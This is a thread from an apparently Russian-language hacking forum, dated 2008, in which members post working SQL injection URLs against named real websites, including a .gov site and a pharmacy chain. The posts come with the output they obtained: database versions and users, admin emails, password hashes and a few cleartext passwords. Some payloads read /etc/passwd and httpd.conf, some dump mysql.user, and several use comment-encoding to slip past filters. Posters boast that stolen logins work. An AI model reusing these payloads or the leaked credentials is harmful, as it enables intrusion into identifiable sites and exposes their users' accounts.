SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. t0ox

    t0ox Member

    Joined:
    23 Oct 2007
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Code:
    http://www.setasia.tv/shows/shows_inside.php?id=-1+union+select+1,version(),3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
    4.0.13
    root@localhost


    Code:
    http://www.e-norprint.co.uk/product_desc.php?id=-1+union+select+1,2,3,4,version(),6,7,8,user(),10,11,12,13,14,15,16,17,18/*
    4.1.22-standard-log
    norprint@localhost
     
    #5101 t0ox, 21 Mar 2008
    Last edited: 21 Mar 2008
    2 people like this.
  2. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    http://www.repairgsm.ru/news/?id=-39+union+select+1,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),3,4,5,6,7+from+INFORMATION_SCHEMA.COLUMNS+limit+206,1/*


    http://www.repairgsm.ru/news/?id=-39+union+select+1,concat(admin_firstname,char(58),admin_lastname,char(58),admin_email_address,char(58),admin_password,char(58),version(),char(58),database(),char(58),user()),3,4,5,6,7+from+admin/*

    Admin: mr
    pass: d24ce5e8a9d8884f68751318e43506dc:d6
     
    1 person likes this.
  3. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    http://rec.ustu.ru/?id=2&add=-1+union+select+1,2,3,concat(name,0x1,user,0x3,password),5,6+FROM+users+limit+0,1--
     
    1 person likes this.
  4. XaCeRoC

    XaCeRoC Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    62
    Likes Received:
    23
    Reputations:
    -12
    Hash:
    8978de5fcec7b7d081a116d1ee85a879

    Первая иньекция :)
     
    #5104 XaCeRoC, 21 Mar 2008
    Last edited: 21 Mar 2008
  5. ~X3RiX~

    ~X3RiX~ Banned

    Joined:
    14 Mar 2008
    Messages:
    22
    Likes Received:
    7
    Reputations:
    -5
    поздравляю!
     
  6. XaCeRoC

    XaCeRoC Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    62
    Likes Received:
    23
    Reputations:
    -12
    Жаль :(
     
  7. t0ox

    t0ox Member

    Joined:
    23 Oct 2007
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Virtual Houston ARTCC
    Code:
    http://www.zhuartcc.com/module.php?page=events&view=event&id=-1+union+select+1,version(),3,user(),5,6,7,8,9,10/*
    5.0.45-community
    zhuartcc_houston@localhost

    ************************************

    Code:
    http://www.finnica.fi/keski-suomi/kirkot/kirkkoesittely.php?id=-1+union+select+1,version(),3,user(),5,6,7,8,9,10/*
    5.0.32-Debian_7etch5-log
    finnica@localhost
    PR: 5

    ************************************

    Code:
    http://advakom.ru/eng/viewproduct.php?id=-1+union+select+1,2,3,version(),5,6,user(),8,database(),10,11,12,13/*
    4.1.20-log
    advakom_@localhost
    advacom_bd

    ************************************

    Code:
    http://www.vikinggames.hu/product.php?id=-1+union+select+1,table_name,3,4,version(),6,7+from+information_schema.tables--
    5.0.32-Debian_7etch5-log

    ************************************

    Code:
    http://www.profootball24x7.com/column_view.php?cid=-1+union+select+version()--
    5.0.37-standard
    [email protected]
    ravens24x7

    ************************************

    Code:
    http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+version()/*
    Code:
    http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+table_name+from+information_schema.tables/*
    Code:
    http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+concat(haslo,char(58),login)+from+logi/*
    Code:
    http://www.efotki.abajt.pl/panel.php?kategoria=-1+union+select+concat(login,char(58),haslo,char(58),mail,char(58),data,char(58),gg)+from+logi/*
    5.0.45-community
    efotki_admin@localhost
    efotki_efotki
     
    1 person likes this.
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    А вот и .GOV

    _http://www.energycodes.gov/implement/state_codes/state_status.php?state_AB=P'+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),version(),char(58),database()),0x71),0x71),6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*

    [email protected]:5.0.18-log:stateinfo

    фильтрация from, но кому надо обойдёт :D
     
    1 person likes this.
  9. 1nf3ct0r

    1nf3ct0r New Member

    Joined:
    15 Aug 2007
    Messages:
    11
    Likes Received:
    3
    Reputations:
    0
    http://www.hardvision.ru/index.php3?dir=news&action=pc&id=-9918+union+select+null,null,null,concat(user,0x3a,password,0x3a,host),null,null,7,null+from+mysql.user

    пароль вроде был 'yf[eq', сейчас не знаю.. раньше пасс и подходил для ssh
     
  10. goror

    goror New Member

    Joined:
    19 Mar 2008
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Если не секрет, как фильтрацию from обойти?
    Прочитал кучу мануалов, не нашел.
     
    1 person likes this.
  11. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    Code:
    http://www.canurb.com/events/event_details.php?id=-105+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3/*
    5.0.45-community:canurb@localhost:canurb_cui
    есть таблицы типа админ, юзер, но че то с ними не получилось =(
     
    2 people like this.
  12. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,080
    Likes Received:
    456
    Reputations:
    38
    hxxp://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

    http://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10/*

    5.0.19-standard
    root@localhost

    кто найдёт раскрытие путей скажите.
    ЗЫ. из базы ничего толкового невытащил. кроме како-го то паса "123456" в md5. логин ненашол. админки или чего-то подобного тоже.
     
    3 people like this.
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Пути можешь сдесь посмотреть :D

    _http://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,LOAD_FILE('/etc/httpd/conf/httpd.conf'),4,5,6,7,8,9,10/*
     
    2 people like this.
  14. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    todobulla.cl
    web7_u1@localhost:5.0.32-Debian_7etch1-log:web7_db1

    Названия таблиц -
    Названия столбцов -
     
    1 person likes this.
  15. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Только учусь!
    Сеть аптечных магазинов!
    5.0.22-log
    zdplus@localhost
    ---------------------------------
    information_schema.tables
    админка
    ------------------------------------------
    Много чего не понятного, прошу на обсуждение в вопросы по уязвимостям
    ------------------------------------------
    все только в учебных целях
     
    #5115 samarin, 22 Mar 2008
    Last edited: 22 Mar 2008
    2 people like this.
  16. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Code:
    http://www.budgiemania.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
    http://www.tieltown.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
    http://www.parrotrecipes.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
    http://lawyerintl.com/modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
    
    Отвечаю мне так впадлу оформлять :(
     
    3 people like this.
  17. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,usr,3,pwd,5+from+zdp_usr/*
    user: *****
    pass: *****
    + заходит. :D
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Muhacir
    тебе делать нечего? человек написал:
    "прошу на обсуждение в вопросы по уязвимостям"
    Как ты думаешь зачем?Там полтора часа назад то_же самое обсуждали
     
  19. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    Code:
    http://www.canadahaitiaction.ca/local.php?id=-6+union+select+1,concat(email,0x3a,pass)+from+Members+limit+0,1/*
    [email protected]:shawn

    Code:
    http://www.furthernoise.org/index.php?iss=-6+union+select+1,concat(name,0x3a,pass)+from+fn_users/*
    Andy:‰ ÿ@b宽I™Þ_ˆý о_О какой то странный пароль

    Code:
    http://ukmoths.org.uk/show.php?id=-75+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,concat(version(),0x3a,database(),0x3a,user()),16/*
    4.1.19-standard-log:ukmoths:[email protected]
     
    2 people like this.
  20. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    http://www.ococtexas.org/
    Code:
    http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11/*
    Code:
    [COLOR=Red][B]5.0.45-community-nt:ococ@localhost:ococ[/B][/COLOR]
    Code:
    http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11%20FROM%20INFORMATION_SCHEMA.TABLES%20--

    http://www.ztocapital.com/
    Code:
    [B]http://www.ztocapital.com/Page.php?id=-1'%20union+select+1,2,3,4,5,6,7,8,9/*[/B]
    5.0.45-community-nt:zto@localhost:zto
     
Thread Status:
Not open for further replies.